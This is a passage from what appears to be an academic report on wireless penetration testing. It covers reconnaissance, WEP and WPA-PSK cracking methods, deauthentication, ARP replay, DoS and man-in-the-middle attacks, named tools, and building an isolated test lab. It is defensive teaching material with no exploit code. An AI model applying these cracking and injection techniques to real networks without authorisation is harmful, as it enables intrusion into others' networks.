3. Assembling, configuring, setting and checking all the hardware devices and

software tools needed to carry out the attacks.

4. Surveying the network site and determining the network boundaries and signal

strength along the network perimeter. Establish the best sites for stationary attacks

by finding a site where the signal strength and the signal to noise ratio (SNR) are

high, and the physical stealth factors such as site visibility, reach ability by

security guards and CCTV are low.

5. Analyzing the network traffic available. Determine whether the traffic is

encrypted or not, and how high the network load is.

6. Trying to break the discovered safeguards. This might involve by passing MAC

and protocol filtering, determining close ESSIDs, cracking WEP, and defeating

higher layer defensive countermeasures.

7. Scanning and discovering all detectable hosts on both the wired and wireless

networks.

8. Passively enumerating these hosts and analyzing security of protocols present on

the wireless and connected wired LANs.

9. Actively enumerating interesting hosts found and launching attacks against them

aimed at gaining top level accounts and privileges.

1.3.1 Determining What Others Know

The first formal step in the ethical-hacking methodology is to perform a high-

level network reconnaissance called foot printing. By looking at the targeted network

from an outsider’s perspective; the goal is to find out what is available to just about

anyone. The important information to search for is [Beaver 2005]:

29

• Radio Signal strength

• Specific SSIDs that are being broadcast

• IP addressing schemes

• Encryption method used such as WEP or WPA

• Hardware makes models

• Software versions

1.3.2 Mapping the Network

After finding out what the general public can find out about the network, the next

step is to create a network map to show how the network is laid out. It is important to

map the network from both inside and outside. This allows the ethical hacker not only to

see internal and external configuration information but also to see configuration

information specific to wireless radio waves that are transmitted both inside and outside

the network [Puneet 2008].

1.3.3 Scanning the System

The next step is to perform a port scanning or enumeration in the wireless network in

order to find more in-depth information about the system. Enumeration involves listing

and identifying the specific services and resources that a target offers. This detailed

information of the system gives the hackers what they need to try to exploit a ton of

potential vulnerabilities. By connecting to the ports on the system, the penetration tester

can obtain information, such as [Puneet 2008]:

• Acceptable usage policies and login warnings on banner pages.

• Software and firm wares versions.

• Operating-system versions

30

• Configuration of operating systems and applications.

Table 1.1 outlines the ports that are often found open and vulnerable to attack.

Table 1.1 Commonly Hacked Wireless Network Ports [Beaver 2005]:

Port Numbers Service Protocols

20 FTP data TCP

21 FTP control TCP

22 SSH TCP

23 Telnet TCP

25 SMTP (Simple Mail Transfer Protocol TCP

53 DNS(Domain Name Server) UDP

80 HTTP (Hypertext Transfer Protocol) TCP

110 POP3 (Post Office Protocol version 3) TCP

135 RPC/DCE end point mapper for Microsoft networks TCP, UDP

137,138,139 NetBIOS over TCP/IP TCP, UDP

161 SNMP (Simple Network Management Protocol TCP,UDP

443 HTTPS (HTTP over SSL) TCP

31

1.3.4 Performing a Vulnerability Assessment

After finding potential “holes” or “windows” into the wireless network, the next

step is to see whether bigger vulnerabilities exist. This can be done manually or using

automated tools such as Nessus or LAN Guard for Microsoft operating systems or

Baseline for Linux operating systems. These tools take a lot of the legwork out of

vulnerabilities assessment, giving the penetration tester more time to spend planning the

last step [Hassell 2004].

1.3.5 Penetrating the System

The last step of the ethical-hacking methodology is the system-penetration phase. This is

the true test of what systems and information can actually be compromised on the

wireless network. With all the information gathered about the wireless network, systems

running and vulnerabilities, the ethical hacker will try to access the resources on the

wireless network without having the right permission just like a malicious hacker will do.

All the attacks and tools described before will be used to do the penetration testing

[Hassell 2004].

WarDriving and Site Surveying

Wardriving is the activity to drive through any city or populated area, sampling

the airwaves for wireless access points. This activity is not illegal as long as the attacker

does not abuse the found networks’ resources and does not eavesdrop on data traffic.

However, site surveying is very different from casual wardriving. Site surveying is

considered to be the initial stage of penetration testing and security auditing. A surveyor

concentrates on a specified network and studies it in great detail. The site survey serves

four major security-related aims [Hurley 2007]:

32

• Finding out where the attackers can physically position themselves.

• Detecting rogue access points and neighbor networks.

• Base lining the interference sources to detect abnormal levels of interference in

the future, such as the interference intentionally created by a jamming device.

• Distinguishing network design and configuration problems from security-related

issues.

There are several wireless network mapping and signal monitoring tools available

in the market and most of them are free [Hassell 2004].

The most common tool for active scanning is NetStumbler which is close source

software that in order to do the active scanning it sends a probe request frame and waits

for probe response to come back. This probe response frames are dissected to show the

network ESSID, channel, the presence of WEP, signal strength, and supported bitrate

[Hurley 2007].

When NetStumbler locates a network, it records the following information [Siles

2007]:

• The signal, noise, and signal-to=noise ratio (SNR) of the discovery.

• The operating channel.

• Basic SSID which is actually the Mac address of the access point.

• Service Set Identifier (SSID) which is the unique identifier for the network.

• The access point’s name.

33

Another useful wireless network discovery tool is AiroPeek which is commercial

wireless network traffic and protocol analyzer from Wildpackets, Inc. AiroPeek offers

multiple features for monitoring and trouble shooting wireless LANs, including [Hurley

2007]:

• Full decodes of packets for 802.11a, 802.11b, and 802.11g.

• A security audit template with pre-defined filters.

• Scan by channel, ESSID or BSSID.

• Displays of data rate, channel and signal strength for each packet.

One of the most common open source tools for wardriving is Kismet. As mentioned

before, kismet is a universal 802.11 sniffer that went a long way from wardriving tool to

a full-blown protocol analyzer and an Intrusion detection System (IDS) suite. Kismet can

detect other scanning programs like NetStumbler, detect Cisco products by using CDP,

detect if there is IP blocking, and discover “closed,” “hidden,” SSIDs for access points

where SSID is disabled. Furthermore, with a GPS driver, kismet can map access point

locations [Hurley 2007].

WEP cracking

As described before, WEP is problematic since it only uses 24 bits for its IV value

range. Eventually the same IV will be used for different data packets. Keystreams,

therefore, are similar, and all an attacker needs to do is to collect data frames for an

extended period using the tools to analyze the traffic and then run a WEP cracking tool.

Another method is to collect unique IVs. With both of these methods the penetration

tester must collect a large number of WEP encrypted packets. A newer PTW attack

requires considerably fewer packets [Walker 2000].

34

FMS attacks are based on the weakness in WEP’s implementation of the RC4

encryption algorithm. To successfully crack the WEP key initially the penetration tester

must collect somewhere between 5 and 10 million packets to capture around 3,000 weak

IVs. Sometimes the attack can be successful with as few as 1,500 weak IVs, and

sometimes it will take more than 5,000 before the crack is successful [Walker 2000].

Another method also relies on the collection of a large number of encrypted

packets. The chopchop attack is a “method of chopping the last byte off the packet and

manipulating enables on to determine the key by collecting unique IVs instead” [Walker

2000]. The chopchop attack reduces the number of packets needed to be collected from

the millions to the hundreds of thousands [Walker 2000].

The third and newest attack is the Pychkine/Tews/Weinmann Attack (PTW) in

which it is no longer needed unique IVs. Therefore, a significantly reduced number of

packets would need to be collected to crack WEP as the IVs can be randomly chosen.

Using this technique, the success of probability of cracking WEP is 50 percent with as

few as 40,000 packets and reduces cracking time to mere minutes [Puneet 2008].

The most commonly used WEP cracking tool is AirSnort which has a very

intuitive interface and is straightforward to use. The number of packets required to crack

a WEP key is somewhere between 5 and 10 million packets, but once this amount of

packets has been gathered, it takes less than one second to identify the key [Vladimirov

2004].

35

Another popular tool is WepAttack which is an open source tool. WepAttack uses

brute-forcing or dictionary attacks to find the right key from the encrypted data pcap

dump file. The advantage of this tool is that it only requires one WEP-encrypted data

packet to start an attack. The possibility to crack WEP without collecting massive

amounts of encrypted data makes the dictionary attacks against 802.11 networks still

using WEP a serious threat [Vladimirov 2004].

Attacks against WPA

Unlike attacks against WEP, attacks against WPA do not require a large number

of packets to be collected. In fact, the attack can be done offline, without being in range

of the target access point. It is also important to note that attacks against WPA can be

successful only when WPA is used with a preshared key. WPA-RADIUS has no known

vulnerabilities. The main idea behind this attack is to capture the four-way Extensible

Authentication Protocol Over LAN (EAPOL) handshake. Then, using an extensive word

list in which each word has to be hashed 4,096 using the HMAC-SHA1 hash function. To

have a reasonable change of success, the preshared key should be shorter than 21

characters [Vladimirov 2004].

36

Denial of Service Attacks

Wireless networks are vulnerable to this type of attack mainly because of two

main reasons. The first one is the lack of frame authentication in 802.11 management

frames such as beacons, association requests, and probe response. The functionality in the

MAC layer of a these networks allows wireless systems to discover, join, and basically

roam free. This implicit trust among wireless systems makes it easy for attackers to spoof

legitimate devices and bring down individual hosts. The second reason is the lack of

physical boundaries for radio waves [Bellardo 2003].

The main objective of any denial of service attack (DoS) is to prevent users from

accessing network resources. The most common methods of triggering DoS attacks are to

flood a network with degenerate or faulty packets, crowding out legitimate traffic and

causing systems not to respond. Although this type of attacks can also be performed in

wired networks, wireless systems are particularly susceptible to DoS attacks because of

the way different layers of the OSI stack interact with one another [Hassell 2004].

An attack using the physical layer in a wireless network is much easier than to

attack the physical layer of a wired network because the physical layer of the wireless

network is the air, the general vicinity around a particular access point. Attackers do not

need to gain access to the internal corporate; they can begin their attack from a car or

even a nearby restaurant, depending on how the access point of the corporate is laid out.

Also, from a forensics investigator’s point of view it is more difficult to discern whether

or not a physical DoS attack has occurred since there is no real evidence [Bellardo 2003].

37

There are several ways to create a DoS attack. An attacker can manufacture a

device that will flood the 2.4 GHz spectrum with noise and illegitimate traffic. For

instance, wireless security cameras, Bluetooth systems, baby monitors, microwave ovens,

and even some poorly 2.4 GHz cordless phone can cause interference at 2.4 GHz, the

range that 802.11 b wireless networks operate [Hassell 2004].

At the data link layer of the OSI stack, again attacks are simpler to launch against

wireless systems than against traditional wired networks. One of the most common ways

to mount an attack against the data link layer is through the manipulation of diversity

antennas. Another issue with the data link layer is spoofed access points. Since, clients

are typically configured to associate with the access point with the strongest signal. An

attacker can simply spoof the SSID of an access point and clients will automatically

associate with it and pass frames back [Hassel 2004].

Although there are several ways to create a Denial of Service attack (DoS), one

common tool is a frame-generation tool such as Void11. This tool was designed for data

link layer DoS resilience testing. Void11 can generate three types of frames, namely,

deauthenticate, authenticate, and associate. The floods of authentication and association

requests can crash of freeze some access points by filling up the buffer space assigned for

handling and processing these requests [Beaver 2005].

38

Man-in-the-middle Attacks

Similar to DoS attacks, man-in-the-middle attacks on a wireless network are

significantly easier to mount than against wired networks. The reason is that typically

such attacks on a wired network require some sort of access to the network. Man-in-the-

middle attacks take two common forms: eavesdropping and manipulation. In

eavesdropping, an attacker just listens to a set of transmissions to and from different hosts

even though the attacker’s computer is not part of the transaction. On the other hand,

manipulation attacks would change the contents of the unauthorized receipt of data

stream to suit a certain purpose [Bayles 2007].

This attack can happen in various ways such as: ARP poisoning where the

attacker manipulates the operating system, router, and switch ARP tables in order to

spoof the victim’s MAC address. Another way is Port Stealing where an attacker can

spoof packets by setting the source address to his victim’s address and the destination

address to his own address. There are various tools that hackers use to create MITM

attacks. The most popular MITM tools are open source tools for the UNIX/Linux and

Windows platforms [Bayles 2007].

AirJack is a device driver or suit of device drivers for 802.11 (a/b/g) raw frame

injection and reception. This tool was originally made up of a custom driver for Prism II

chipset cards. The main functionality of AirJack is based around its ability to send

deauthenticate 8021.11 frames. The attack utilities included in AirJack contain a Layer 2

man-in-the-middle attack [Beaver 2005].

39

As shown, all these attacks and the tools used to perpetuate them is a very

important knowledge of the forensics investigator. By addressing all the how-to of all

these attacks and also, showing all the features of all the tools the forensics investigator

will gain a deep understanding of how to conduct an investigation and furthermore, to

determine what type of attack has been deployed in the wireless network [Hassell 2004].

40

2. NARRATIVE

The very idea of a wireless network introduces multiple venues for attack and

penetration that either much more difficult or completely impossible to execute with a

standard, wired network. Wireless networks only know the boundaries of their own signal

where streets, parks and nearby buildings all offer a virtual port into the wireless network.

There is a general misconception that only large enterprises are at risk from cracking.

This is a myth, but it is very prevalent. Large corporations are where the money and

sensitive data are. However, a common error is to consider small enterprises and even

home user networks to be off the crackers scope because they are not interesting and have

low value for an attacker. Small business and home networks provide the cracker with:

anonymous access, low probability of getting caught, free bandwidth, and the ease of

breaking in [Vladimirov 2004].

Security managers need to have an understanding of these issues in order to

overcome them and also, they need to know all the tools that are used by attackers when

conducting an attack on a wireless network. By reviewing how professional ethical

hackers deploy a wireless penetration testing and all the tools available in the market to

conduct an effective wireless investigation, a security manager will gain a deep

understanding of what tools should be used for specific situations. There are many tools

available for learning how to do penetration testing. However, few targets are available

with which to practice pen testing safely and legally [Bayles 2007].

41

Many people learn penetration tactics by attacking systems on the Internet.

Although this might provide a wealth of opportunities and targets, it is highly dangerous

because it is illegal. Many people have gone to jail or paid huge amounts of money in

fines, all for hacking Internet sites. Furthermore, for security managers, trying to learn on

their corporate live system is inadmissible [Bayles 2007].

The only real and safe option to those who want to learn penetration testing

legally is to create a penetration lab. However, there is the added difficulty of creating

real-world scenarios to practice against, especially for those who do not know what a

real-world scenario might look. This obstacle often is daunting enough to discourage

many from learning how to deploy a penetration test [Bayles 2007].

2.1 Setting Up a Penetration Test Lab

One of the biggest mistakes people make when developing a lab is that they use

systems connected to the internet or their corporate intranet. A lot of what occurs during a

penetration test can be harmful to networks and systems if the test is performed

improperly. The penetration tester can shut down the entire network, cutting the company

off from revenue, and negatively affecting the company public image with customers.

2.1.1 Isolating the Pent-test Lab

The best example for this point is what Robert Tappan Morris, who was a student

at Cornell University in 1988 [Bayles 2007].

42

Morris released what is considered to be the first worm on the Internet. “He

created the worm to try to discover how large the Internet was at the time, and as he has

stated his intentions were no malicious” [Bayles 2007]. However, the worm jumped from

system to system, copying itself multiple times, and each copy tried to spread itself to

other systems on the Internet creating a denial-of-service attack against the entire

Internet. The total estimated damage between $10 millions and $100 millions. Morris was

tried in a court of law and was convicted. With this example is clear that someone dealing

with anything remotely hazardous to the network should be extremely paranoid and think

on security first [Bayles 2007].

Since penetration testing can be a hazardous activity, it is vital that a penetration

test lab be completely isolated from any other network. This produces some problems,

such as having no internet connection to look up vulnerabilities and exploit information,

and download patches, application, and tools. However, to guarantee that nothing in the

network leaks out, the penetration tester must take every precaution to make sure network

does not communicate with any other network. Nevertheless this becomes problematic

when the network contains wireless appliances. How to isolate a pent-test lab with

wireless access from other networks? [Bayles 2007].

43

In a penetration test involving a wireless network, first the penetration tester

needs to gain access to the network. It does not matter whether that connection is via the

wireless portion of the network or a plug in the wall. All that matters is that access is

established. Once the access is accomplished, the penetration tester move on to selecting

targets using techniques that work over either wireless or wired networks. So, in order to

isolate a pen-test lab with wireless access, the penetration tester needs to have two

separate labs [Bayles 2007]. A wireless lab where the penetration tester practice breaking

into the wireless access point and another lab where the penetration tester conducts the

system attacks. That way, all future attacks are isolated and are not exposing other

networks [Bayles 2007].

However, in many situations in which wireless access point are in the vicinity of

the wireless test lab, the penetration tester must be extremely careful that the attacks

deployed are only in the pen-tester’s lab, and no other wireless network. On the other

hand, the good thing about wireless attacks is that the standard practice is to pinpoint the

attacks against the access point using the Media Access Control (MAC) address unique to

the wireless access point used in the lab [Bayles 2007].

2.1.2 Securing from Unauthorized Access

Once all the precautions to isolate the pen-test lab are done, the second step is to

secure the pen-test lab from all unauthorized access. Because the penetration test lab

should simulate the customer’s network as closely as possible, getting access to the pen-

test lab is almost as valuable as gaining access to the production network. Furthermore, it

is important to secure install disks and verify the integrity of all the files, and software

used in the pen-test lab.

44

The pen-tester effective way to verify the integrity of a file is by using a hash

function. Once the pen-tester has downloaded a file, he must verify that he has a true

copy of the file by conducting an MD5 hash against it, and comparing it to the file

author’s published value [Bayles 2007].

2.1.3 Managing Storage Devices

Another precaution that a pen-tester should have is to design a safe way to bring

data into the network. Once the pen-test lab is completely isolated, the only way to bring

any patches, codes or files onto the pen-test lab, is by using CDs, DVDs or thumb drives.

However, in order to prevent leaking of sometimes viruses that could have spread across

the pen-test lab network, these storage units should be on read-only mode. Also, all CDs

and DVDs should all be closed after transferring the desired data [Bayles 2007].

Furthermore, not labeling properly can become a huge problem, especially if

someone who is not part of the team picks a CD or DVD up which contains malicious

software. Finally, after finishing all the tests it is important to document all the findings.

A pen-tester should be careful to write, transport, and archive this information in a secure

manner. All other security efforts are meaningless if a malicious person can acquire the

final pen-test report with all the glaring deficiencies and exploitable vulnerabilities

summarized with all the specific steps needed to bring the target network to its knees

[Bayles 2007].

45

2.2 Types of Penetration Test labs

Before start building the pen-test lab it is important to ensure that the pen-tester

has the right equipment for the task. Knowing exactly what kind of lab the pen-tester

needs is a task that is going to save time and money. There are five possible types [Bayles

2007]:

• The virtual pen-test lab

• The internal pen-test lab

• The external pen-test lab

• The project-specific pen test lab

• And ad hoc lab

2.2.1 Virtual Pen-Test Lab

The virtual pen-test lab is the smallest the pen-tester can build. It is just for

starting out learning how to conduct a penetration testing. If the main goal of the project

is related to how to attack a system and not worried about navigating through a network,

using virtualization software that can emulate multiple operating systems will provide a

wealth of possibilities. Virtualization software has become quite complex and versatile in

the past few years [Bayles 2007].

46

However, some of today’s more sophisticated viruses check for virtualization

before launching their malicious payload. This means that attacks using this type of

viruses to a virtual server will not work or the pen tester will not get the expected results.

Since virtual pen-test lab cannot reflect the real-world network in today’s corporate

environment, most beginner labs consist of two systems connected through a router. One

system is the target, the second system is the penetration tester’s machine, and the router

is there to provide network services, such as domain name system (DNS) and Dynamic

Host Configuration Protocol (DHCP) [Bayles 2007].

2.2.2 Internal Pen-Test Lab

This set up, is called internal pen-test lab because the penetration tester is given

internal network access. The objective of this lab is to see exactly what vulnerabilities

exist on the corporate network, not to see whether someone can break into the network. It

is assumed that someone who has enough time on his hands will eventually succeed in

getting into the network. The main goal with an internal penetration test is to find out

exactly what an intruder might grab once he is in [Bayles 2007].

47

Figure 2.1 A Sample Internal Pen-test lab

2.2.3 External Pen-Test Lab

In order to test vulnerabilities related to how an intruder can get into the corporate

network the test-lab to use is the external pen-test lab. This type of lab follows the

principle of defense in depth. That means that the lab needs to include a firewall as a

bare minimum. Designed to keep bad guys out, a firewall can be a difficult boundary to

get past. However, there are exceptions. Often it becomes necessary for firewall

administrators to create gaps in the firewall, allowing traffic to enter and leave the

network unfettered. Sometimes holes are left open by accident, or because there is an

expectation of future need. Figure 2.2 shows a sample of an external Pen-test lab [VAC

2008].

48

Figure 2.2 A Sample External Pen-test Lab

In external penetration tests, the objective is to see whether there is a way to

penetrate past various obstacles in the network, and gain access to a system behind these

defenses. Other defenses include the use of a Demilitarized Zone (DMZ), proxies, the

Network Address Translation (NAT) mechanism, network intrusion detection systems,

and more. Of course, the more defenses, the closer the pen-tester gets to mimicking real-

world corporate networks [VAC 2008].

2.2.4 Project-Specific Pen-test lab

Sometimes it is imperative to create an exact replica of the target network. This

might be necessary because the production network is so sensitive that management

cannot risk any downtime. In this case, the pen-test team needs access to the same

equipment as what is available in the target network. Project-Specific Pen-test labs are

rarely created because of their expensive cost, but they do exist. Extreme attention is

needed when building this type of labs. It is imperative to replicate accurately the

production network since the pen-tester might get invalid test results if the test lab is not

exactly the same as the production network [VAC 2008].

49

2.2.5 Ad Hoc Lab

The last type of lab is called the Ad Hoc Lab and often this lab is used to test one

specific thing on a server such as a new patch, or traffic needs to be sniffed to see

whether there are any changes to what is being sent. This type is used frequently even

when a more formal lab setup is required. An ad hoc network is really a shortcut, and it

should be an exception to standard practices. A formal process should exist to determine

exactly which type of lab is needed for each penetration test project [VAC 2008].

2.3 Pen-Test Lab Description

For the purpose of this project, the external pen-test lab and the internal pen-test

lab were used. The external pen-test lab was used to prove how wireless network can

become a backdoor to the main network, and the internal pen-test lab was used to address

the most common configuration flaws. These two labs were created at the Network

Security Lab following all the steps described above. After defining which test labs were

suitable for the project, the second step was to select the right hardware.

2.3.1 Hardware Description

One of the most important hardware components needed for penetration testing is

the wireless card. The main technical challenges associated to wireless penetration testing

are due to the intrinsic nature of radio frequency (RF) communications and the

complexity of the physical medium and the 802.11 specifications [Arbaugh 2003].

Standard wireless equipment only contains a single radio component; therefore, it is only

capable of listening to a specific channel in a given moment.

50

Although there are some tools that have used a technique called channel hopping

to scan the whole frequency spectrum and sample all the different channels, these tools

can only listen for a few milliseconds in each channel. As mentioned before the Intel

PRO/Wireless 3945 802.11 a/b/g wireless card is the wireless card used in this project.

Bellow table 2.1 shows all the specifications and features of this wireless card [VAC

2008].

Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications

Main Specifications

Product Description

Intel PRO/Wireless 3945ABG Network Connection - network adapter

Device Type Network adapter

Form Factor Plug-in card

Interface (Bus) Type Mini-PCI Express

Data Link Protocol IEEE 802.11b, IEEE 802.11a, IEEE 802.11g

Compliant Standards

IEEE 802.11b, IEEE 802.11a, IEEE 802.11g, IEEE 802.1x, Wi-Fi CERTIFIED

Networking

Spread Spectrum Method OFDM

Data Transfer Rate 54 Mbps

Line Coding Format DBPSK, DQPSK, CCK, 64 QAM, BPSK, QPSK, 16 QAM

Miscellaneous

Encryption Algorithm LEAP, MD5, AES, 128-bit WEP, 64-bit WEP, TLS, PEAP, TTLS, TKIP, WPA, WPA2

Compliant Standards UL, cUL, IEC 60950, CB

51

The Intel PRO/Wireless 3945 802.11 a/b/g wireless card is able to listen to

multiple channels in a given moment. However, this card does not have the capability to

inject packets for the packet injection attack. In order to overcome this technical handicap

special drivers were installed. Another key component is the Wireless Access point that

was used during the penetration testing. The model chosen was the Linksys WAP54G.

Table 2.1 describes the main specifications of this Access point.

Table 2.2 Access Point Specifications

Specifications

Model Number WAP54G

Standards

IEEE 802.11g, IEEE 802.11b IEEE 802.3, IEEE 802.3u

Ports/Buttons

One 10/100 Auto-Cross Over port, power port, reset and SES button

Cabling Type RJ-45

Security Features

WPA, Linksys Wireless Guard, WEP Encryption MAC filtering, SSID Broadcast enable/disable

WEP key bits 64/128-bit

This wireless access point supports data rates up to 54 Mbps, and also is

compatible with existing 802.11b devices. The WAP54G wireless router supports WPA

security, and 64/128 bit WEP Encryption. Also, wireless bridging, wireless repeater,

MAC filtering and event logging. Once the wireless card and the Wireless access point

used were described, the second step is to define the software tools that were used [VAC

2008].

52

2.3.2 Software Description

All the tools used in this project are Open Source tools available in the Backtrack

3.0 Live CD, and others downloaded from different URLs. Backtrack is the most top

rated Linux live distribution focused on penetration testing. With no installation

whatsoever, the analysis platform is started directly from the CD-Rom and is fully

accessible within minutes. Backtrack has a long history and was based on many different

Linux distributions until finally being based on a Slackware Linux distribution.

Every package, kernel configuration and script is optimized to be used by security

penetration testers. Also, patches and automation have been added, applied or developed

to provide a neat and ready to-go environment. Figure 2.3 shows Backtrack 3.0

Figure 2.3 Backtrack 3.0 Desktop

53

Backtrack 3.0 is the latest version. This new version support more and newer

hardware as well as provide more flexibility and modularity. Also, this new version has

more than 300 different up-to-date tools which are logically structured according to the

work flow of security professionals. Furthermore, backtrack 3.0 is aligned to penetration

testing methodologies and assessment frameworks (ISSAF and OSSTMM). This is

helpful during daily reporting tasks.

The first tool used is NetStumbler. It is free, easy to install and simple to

use. Netstumbler is a tool for Windows that allows the pen-tester to detect Wireless Local

Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It also provides radio

frequency (RF) signal information and other related to combining computers and radios.

Netstumbler sends out a probe request about once a second, and reports the responses

with information such as the Service Set Identifier (SSID) and the Media Access Control

(MAC) numbers. This is known as Active Scanning. Figure 2.4 displays the main screen

of Netstumbler [Bayles 2007].

54

Figure 2.4 NetStumbler Main Screen

One of the weaknesses of Netstumbler is its inability to detect Wireless LANs

utilizing hidden SSIDs. However, it does include a very useful graphical representation of

signal strength (indicated in green) and noise ratio (indicated in red) over time, which is

useful for direction finding Wireless LANs (Figure 2.5). Also, with a GPS device a Net

Stumbler can create a file in the .ns1 format which can be imported into Microsoft’s

MapPoint software to produce a graphic representation of any Wardriving or Site Surveys

[Bayles 2007].

55

Figure 2.5 Graphical representation of Signal Strength

In order to get the wireless access points who were not broadcasting their SSID,

the kismet tool was used. Kismet is an 802.11 layer two wireless network detector,

sniffer, and intrusion detection system which comes with the Backtrack 3.0 Live CD.

Kismet will work with any wireless card which supports raw monitoring (rfmon) mode,

and can sniff 802.11b, 802.11a, and 802.11g traffic [Hurley 2007].

It identifies networks by passively collecting packets and detecting standard

named networks, hidden networks, and inferring the presence of nonbeaconing networks

via data traffic. Also, kismet has a very powerful user interface that provides a large

amount of information about each access point identified. Figure 2.6 is the kismet main

interface [Hurley 2007].

56

Figure 2.6 The Kismet Interface

The network list can be sorted by 14 different ways with the sort options. Once

the sort method is defined, additional information about each network can be found.

Networks in red are networks that the access point is using factory default settings.

Networks in yellow have the access points that are broadcasting without any encryption

method. The green ones are secure networks with an encryption method in place. The

blue ones are access points that are not broadcasting their SSID [Hurley 2007].

As mentioned before Kismet is a passive detector, however it captures packages

of all the wireless access points in range. This can be dangerous because no one is

supposed to be capturing packets. NetStumbler and Kismet were used in the project for

Wardriving and Site Surveying [Hurley 2007].

57

With all the information collected from those two tools the second step is to

attempt to crack the encryption method used by the access point if any used. For this

purpose the Aircrack-ng 1.0 set of tools was used. Again, this is part of the Backtrack 3.0

Live CD. Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can

recover keys once enough data packets have been captured. It implements the FMS attack

with some optimizations like KoreK attacks. Also, in the latest version it implements the

all-new PTW attack, thus making the attack much faster compared to other WEP

cracking tools [Hurley 2007].

Airodump-ng which is part of the Aircrack-ng suite of tools is used for packet

capturing of raw 802.11 frames. However, this tool is particularly suitable for collecting

WEP initialization vector (IVs) for the intent of using them with Aircrack-ng. Airodump-

ng can detect all the near access points, and then it can be set to listen to one specific.

Furthermore, to minimize disk space used by the capture, it can be set to only stores the

initialization vectors and not the full packet. Yet, in order to crack WPA or use the PTW

attack on WEP, the full packet is needed [Hurley 2007].

If no traffic is being generated by the network, Aireplay-ng tool can be used to

inject frames. There are different attacks that are implemented by this tool. The first one

is causing deauthentications for the purpose of capturing WPA handshake data,

recovering a hidden ESSID, generating ARP request. This attack sends disassociate

packets to one or more clients which are currently associated with a particular access

point. Since, in order to crack WPA-PSK it is only needed the four-way (EAPOL)

handshake. By forcing an associated client to reconnect, the attacker collects these four

packets [Hurley 2007].

58

Once these packets are collected the tool used to crack WPA-PSK was CoWPAtty

by Joshua Wright which is a tool for automating the offline dictionary attack that WPA-

PSK networks are vulnerable to. CoWPatty goes through the process of finding the

Primary Temporary Key (PTK) for every word or phrase in a dictionary and checking to

see if that PTK generates the correct Message Integrity Check (MIC) value for a given

packet. From the four way handshake packets it firsts finds the SSID of the network

which is needed in the hashing algorithm to find the Primary Master Key (PMK). To find

the Primary Temporary Key (PTK), the random values and MAC addresses that are used

in the four way handshake are needed. Once they are found, they are used with the PMK

to find a PTK value [Hurley 2007].

Finally this value can be used to find the MIC of a packet. If the calculated MIC

matches the MIC given in the packet, the correct passphrase has been found. If not the

process is repeated with the next dictionary word/phrase. In order to speed up the process

by three orders of magnitude a penetration tester can use precomputed hash tables. These

tables can be found in the Internet in both 7 GB and 34 GB varieties. The 7 GB tables

were created using a dictionary file of 172,000 words and the 1,000 most common

SSIDs. If the SSID of the network it is not among the 1,000 most common the

penetration tester can generate a table using the genpmk tool included with CoWPatty. If

the passphrase it is not included in the dictionary list the attack will fail. Furthermore, this

attack is totally useless if there are no associated wireless clients [Hurley 2007].

59

The second attack is fake authentication which allows the penetration tester to

perform the two types of WEP authentication (Open System and Shared Key) to associate

with the access point. This is useful when an associated MAC address is needed and there

is currently no associated client. If there are associated clients the interactive packet

replay attack can be used. This attack allows the attacker to choose a specific packet for

replaying. The attack can obtain packets to replay from two sources. The first being a live

flow of packets, and the second being from a cap file. Any packet captured cannot be

used to replay, only certain packets can be replayed successfully which means that it is

accepted by the access point and cause a new initialization vector to be generated [Hurley

2007].

Nevertheless, with certain tools such as packetforge-ng the penetration tester can

generate packets and store them in a cap file. Since, Aireplay-ng can read from a file

containing a packet previously created with packetforge-ng the penetration tester can

successfully inject packets even if no traffic is being generated by any associated client.

A better way to generate new IVs is with the ARP request replay attack. In order to

deploy this attack an ARP packet is needed. Once, the program listens for an ARP packet

then retransmits it back to the access point. This, in turn, causes the access point to repeat

the ARP packet with a new IV. Then, the program retransmits the same ARP packet over

and over [Hurley 2007].

60

As mentioned before, packetforge-ng can generate any type of packets. However,

in order to do so, it needs the PRGA (Pseudo random generation algorithm). In order to

recover the PRGA Aireplay-ng needs at least one data packet to be received from the

access point. Then, it attempts to send ARP and/or LLC packets with known content to

the access point. If the packet is successfully echoed back by the AP a larger amount of

keying information can be obtained from the returned packet. This cycle is repeated

several times until 1500 bytes of PRGA are obtained. Once the PRGA is written to a file,

packetforge-ng can generate successfully generate valid packets [Hurley 2007].

Once the pen-tester has access to the wireless network, the next step is to identify

the specific services and resources that a target offers. The enumeration process

encompasses the port scanning, service identification, and fingerprinting attacks.

Although there are many different port scanners, they all operate in much the same way.

The most common type of scan uses the TCP SYN flag which appears in the TCP

connection sequence or handshake [Hassell 2004].

This type of scan begins by sending a SYN packet to a destination port. The

target receives the SYN packet, responding with a SYN/ACK response if the port is open

or an RST if the port is closed. Because the TCP handshake did not complete, the service

on the target does not see a full connection and will usually not log. The most common

tools associated with enumeration include Nmap, Amap, and LanGuard [Hassell 2004].

61

Other type of port scans uses various TCP flag set such as FIN, PUSH and URG.

Different systems respond differently to these packets, so there is an element of OS

detection when using these flags. However, the main purpose is to bypass access controls

that specifically key on connections initiated with specific TCP flags set. Table 2.3

summaries the common Nmap options along with the scan types initiated and expected

response [Hassell 2004].

Table 2.3 Nmap Options and Scan Types [Beaver 2005]

Nmap Switch

Type of packet Sent

Response if Open

Response if Closed Description

"-sT" OS-based connect()

Connection Made

Connection Refused or Timeout

Basic nonprivileged scan type

"-sS" TCP SYN Packet SYN/ACK RST

Default scan type with root privileges

"-sN"

TCP packet with no flags

Connection Timeout RST

Designed to bypass nonstateful firewalls

"-sV" Subprotocol- specific probe N/A N/A

Used to determine service running on open port; uses service database.

"-O"

Both TCP and UDP packet probes N/A N/A

Uses multiple methods to determine target OS/ firmware version

62

3. SYSTEM RESEARCH

There were created two pen-test labs for the purpose of deploying a penetration

testing methodology. The first one is an external pen-test lab, and the second is an

internal pen-test lab.

3.1 External pen-test lab

In an external pen-test lab the goal is to determine whether it is possible to

penetrate the network without having the permissions to do so [Beaver 2005]. As

mentioned before in this type of labs the defense in depth principle is followed. The

layout of the network is:

Figure 3.1 External Pen-test Lab

The first scenario was designed to be the most insecure of all where the access

point was set with no security at all. “There have been reported many cases where

companies have been attacked through a wireless access point installed without the

consent of the security manager “[Beaver 2005].

63

The access point attacked was unencrypted and the SSID of the network was

visible. In order to find if an employee has set a wireless point the tool used was

Netstumbler. Figure 3.2 shows all the access points broadcasting their SSID.

Figure 3.2 Access Point Broadcasting

There are 14 Active Access Points broadcasting near the range of the pen tester‘s

